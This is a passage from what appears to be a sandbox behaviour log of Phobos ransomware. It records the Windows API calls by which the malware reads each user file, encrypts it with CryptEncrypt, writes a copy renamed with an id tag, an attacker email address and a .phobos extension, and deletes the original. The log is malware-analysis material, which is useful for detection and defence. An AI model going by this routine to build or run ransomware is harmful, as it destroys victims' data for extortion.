g-i-7iPCiO2e.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\5_haxpp g-i-7ipcio2e.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0192.771] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0192.772] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0192.772] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\5_HAXPP g-i-7iPCiO2e.flv.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\5_haxpp g-i-7ipcio2e.flv.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x164 [0192.772] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32a28) returned 1 [0192.772] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0192.772] ReadFile (in: hFile=0x134, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x61fe, lpOverlapped=0x0) returned 1 [0192.774] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x6200, dwBufLen=0x6200 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x6200) returned 1 [0192.774] WriteFile (in: hFile=0x164, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x6200, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x6200, lpOverlapped=0x0) returned 1 [0192.776] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa327e8) returned 1 [0192.776] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0192.776] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x60, dwBufLen=0x60 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x60) returned 1 [0192.776] CryptDestroyKey (hKey=0xa327e8) returned 1 [0192.776] WriteFile (in: hFile=0x164, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x112, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x112, lpOverlapped=0x0) returned 1 [0192.776] CryptDestroyKey (hKey=0xa32a28) returned 1 [0192.777] CloseHandle (hObject=0x134) returned 1 [0192.777] CloseHandle (hObject=0x164) returned 1 [0192.777] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\5_HAXPP g-i-7iPCiO2e.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\5_haxpp g-i-7ipcio2e.flv")) returned 1 [0192.779] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0192.779] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\6ci0JU2A.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\6ci0ju2a.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x164 [0192.780] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=67550) returned 1 [0192.780] CloseHandle (hObject=0x164) returned 1 [0192.780] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\6ci0JU2A.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\6ci0ju2a.jpg")) returned 0x2020 [0192.780] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\6ci0JU2A.jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\6ci0ju2a.jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0192.780] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\6ci0JU2A.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\6ci0ju2a.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x164 [0192.780] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0192.780] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0192.780] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\6ci0JU2A.jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\6ci0ju2a.jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0192.781] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32a28) returned 1 [0192.781] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0192.781] ReadFile (in: hFile=0x164, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x107de, lpOverlapped=0x0) returned 1 [0192.782] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x107e0, dwBufLen=0x107e0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x107e0) returned 1 [0192.783] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x107e0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x107e0, lpOverlapped=0x0) returned 1 [0192.784] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa327e8) returned 1 [0192.784] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0192.784] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0192.784] CryptDestroyKey (hKey=0xa327e8) returned 1 [0192.784] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0192.784] CryptDestroyKey (hKey=0xa32a28) returned 1 [0192.784] CloseHandle (hObject=0x164) returned 1 [0192.784] CloseHandle (hObject=0x134) returned 1 [0192.785] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\6ci0JU2A.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\6ci0ju2a.jpg")) returned 1 [0192.786] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0192.786] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\6DMG9aa.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\6dmg9aa.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0192.789] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=6492) returned 1 [0192.789] CloseHandle (hObject=0x134) returned 1 [0192.789] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\6DMG9aa.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\6dmg9aa.avi")) returned 0x2020 [0192.789] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\6DMG9aa.avi.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\6dmg9aa.avi.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0192.789] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\6DMG9aa.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\6dmg9aa.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0192.789] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0192.789] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0192.789] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\6DMG9aa.avi.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\6dmg9aa.avi.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x164 [0192.790] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32a28) returned 1 [0192.790] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0192.790] ReadFile (in: hFile=0x134, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x195c, lpOverlapped=0x0) returned 1 [0192.791] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x1960, dwBufLen=0x1960 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x1960) returned 1 [0192.791] WriteFile (in: hFile=0x164, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x1960, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x1960, lpOverlapped=0x0) returned 1 [0192.792] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa327e8) returned 1 [0192.793] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0192.793] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0192.793] CryptDestroyKey (hKey=0xa327e8) returned 1 [0192.793] WriteFile (in: hFile=0x164, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0192.793] CryptDestroyKey (hKey=0xa32a28) returned 1 [0192.793] CloseHandle (hObject=0x134) returned 1 [0192.793] CloseHandle (hObject=0x164) returned 1 [0192.793] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\6DMG9aa.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\6dmg9aa.avi")) returned 1 [0192.794] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0192.794] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\6qo4ZLZi.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\6qo4zlzi.csv"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x164 [0192.795] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=82575) returned 1 [0192.795] CloseHandle (hObject=0x164) returned 1 [0192.797] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\6qo4ZLZi.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\6qo4zlzi.csv")) returned 0x2020 [0192.797] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\6qo4ZLZi.csv.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\6qo4zlzi.csv.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0192.797] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\6qo4ZLZi.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\6qo4zlzi.csv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x164 [0192.797] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0192.797] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0192.797] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\6qo4ZLZi.csv.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\6qo4zlzi.csv.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0192.797] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32a28) returned 1 [0192.797] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0192.797] ReadFile (in: hFile=0x164, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x1428f, lpOverlapped=0x0) returned 1 [0192.863] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x14290, dwBufLen=0x14290 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x14290) returned 1 [0192.872] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x14290, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x14290, lpOverlapped=0x0) returned 1 [0192.873] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa327e8) returned 1 [0192.873] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0192.873] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0192.873] CryptDestroyKey (hKey=0xa327e8) returned 1 [0192.873] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0192.873] CryptDestroyKey (hKey=0xa32a28) returned 1 [0192.873] CloseHandle (hObject=0x164) returned 1 [0192.873] CloseHandle (hObject=0x134) returned 1 [0192.874] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\6qo4ZLZi.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\6qo4zlzi.csv")) returned 1 [0192.875] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0192.875] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\b-Hp.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\b-hp.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0192.875] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=48082) returned 1 [0192.875] CloseHandle (hObject=0x134) returned 1 [0192.877] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\b-Hp.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\b-hp.gif")) returned 0x2020 [0192.877] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\b-Hp.gif.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\b-hp.gif.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0192.877] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\b-Hp.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\b-hp.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0192.877] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0192.877] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0192.877] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\b-Hp.gif.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\b-hp.gif.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x164 [0192.878] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32a28) returned 1 [0192.878] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0192.878] ReadFile (in: hFile=0x134, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xbbd2, lpOverlapped=0x0) returned 1 [0192.879] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xbbe0, dwBufLen=0xbbe0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xbbe0) returned 1 [0192.880] WriteFile (in: hFile=0x164, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xbbe0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xbbe0, lpOverlapped=0x0) returned 1 [0192.881] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa327e8) returned 1 [0192.881] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0192.884] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0192.884] CryptDestroyKey (hKey=0xa327e8) returned 1 [0192.884] WriteFile (in: hFile=0x164, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0192.884] CryptDestroyKey (hKey=0xa32a28) returned 1 [0192.884] CloseHandle (hObject=0x134) returned 1 [0192.884] CloseHandle (hObject=0x164) returned 1 [0192.884] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\b-Hp.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\b-hp.gif")) returned 1 [0192.886] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0192.886] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\clAsttDrcm.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\clasttdrcm.ods"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x164 [0192.887] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=69615) returned 1 [0192.887] CloseHandle (hObject=0x164) returned 1 [0192.887] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\clAsttDrcm.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\clasttdrcm.ods")) returned 0x2020 [0192.887] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\clAsttDrcm.ods.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\clasttdrcm.ods.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0192.887] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\clAsttDrcm.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\clasttdrcm.ods"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x164 [0192.887] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0192.887] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0192.887] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\clAsttDrcm.ods.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\clasttdrcm.ods.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0192.888] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32a28) returned 1 [0192.888] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0192.888] ReadFile (in: hFile=0x164, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x10fef, lpOverlapped=0x0) returned 1 [0192.889] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, 